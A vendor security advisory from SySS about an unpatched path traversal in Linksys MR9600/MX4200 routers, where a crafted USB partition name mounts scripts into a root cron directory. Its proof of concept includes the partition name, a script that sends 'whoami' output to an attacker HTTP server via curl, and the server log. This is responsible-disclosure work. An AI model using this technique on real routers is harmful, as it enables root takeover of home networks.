Advisory ID: SYSS-2025-001 Product: MR9600, MX4200 (and potentially others) Manufacturer: LinksysAffected Version(s): 1.0.4.205530 for MR9600, 1.0.13.210200 for MX4200 (and potentially others)
Tested Version(s): 1.0.4.205530 for MR9600, 1.0.13.210200 for MX4200 Vulnerability Type: Path Traversal (CWE-22) Risk Level: Medium Solution Status: Open Manufacturer Notification: 2025-03-18 Solution Date: - Public Disclosure: 2026-02-12 CVE Reference: Not yet assigned Author of Advisory: Christian Zäske, SySS GmbH
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Overview: Linksys MX4200 is a Wi-Fi mesh router targeting home users. The manufacturer describes the product as follows (see [1]): "This router supports the latest Wi-Fi® 6 (802.11ax) standard for next-level streaming and gaming. Its powerful WiFi 6 mesh coverage offers faster WiFi performance for lag-free online gaming and simultaneous streaming to every device and corner of your home." Due to missing neutralization of special elements, the contents of a USB drive partition can be mounted in an arbitrary location of the file system. This can also result in the execution of shell scripts in the context of the root user. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Vulnerability Details: The Linksys MX4200 (and other models) provides a USB port to share the contents of a USB drive as an SMB share in the local network. Internally, the partition is mounted at "/tmp/anon_smb/<partition name>" by the script "/etc/init.d/service_tsmb.sh". Because the script does not neutralize special elements such as "../", the mount point can be changed to arbitrary locations by setting the name of the partition on the USB drive to "../../", followed by a path of the file system on the device. By choosing a path where scripts get executed on a regular basis, this vulnerability can be used to execute commands in the context of the root user. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Proof of Concept (PoC): To execute the following shell script, the partition of the USB drive can be named "../../tmp/cron/cron.everyminute" and the script can be copied to the root of this partition. After plugging the USB drive into the device, the partition will be mounted at "/tmp/cron/cron.everyminute". The following script shows the contents of the file "exploit.sh", which will be mounted into the "cron.everyminute" directory: #!/bin/bash curl http://192.168.2.57/$(whoami) Because this directory is used to run every script it contains for every minute, the script will get executed in a maximum of 60 seconds. On the attacker's computer, a simple HTTP server is spawned. After plugging in the USB stick, the previous script is executed and access to the HTTP server is logged, as can be seen in the following snippet: $ python -m http.server 80 Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ... 192.168.2.1 - - [01/Jan/2024 13:00:00] "GET /root HTTP/1.1" 404 - ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Solution: There is no known solution yet. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclosure Timeline: 2024-11-11: Vulnerability discovered 2025-03-18: Vulnerability reported to manufacturer 2025-04-07: First response from manufacturer 2025-04-14: Requested an update from manufacturer 2025-05-06: Acknowledgment of vulnerabilities by the manufacturer 2026-02-12: Public disclosure ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ References: [1] Product website for Linksys MX4200 https://support.linksys.com/kb/article/952-en/ [2] SySS Security Advisory SYSS-2025-001 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2025-001.txt [3] SySS Responsible Disclosure Policy https://www.syss.de/en/responsible-disclosure-policy ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Credits: This security vulnerability was found by Christian Zäske of SySS GmbH. E-Mail: [email protected]Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Christian_Zaeske.asc
Key ID: 0x7B00D164A32F9AC9 Key Fingerprint: 51D4 6E9B 3C29 7347 AC01 0F5A 7B00 D164 A32F 9AC9 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclaimer: The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of this security advisory is available on the SySS website. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Copyright: Creative Commons - Attribution (by) - Version 3.0 URL: https://creativecommons.org/licenses/by/3.0/deed.en
OpenPGP_0x7B00D164A32F9AC9.asc
Description: OpenPGP public key
OpenPGP_signature.asc
Description: OpenPGP digital signature
_______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: https://seclists.org/fulldisclosure/
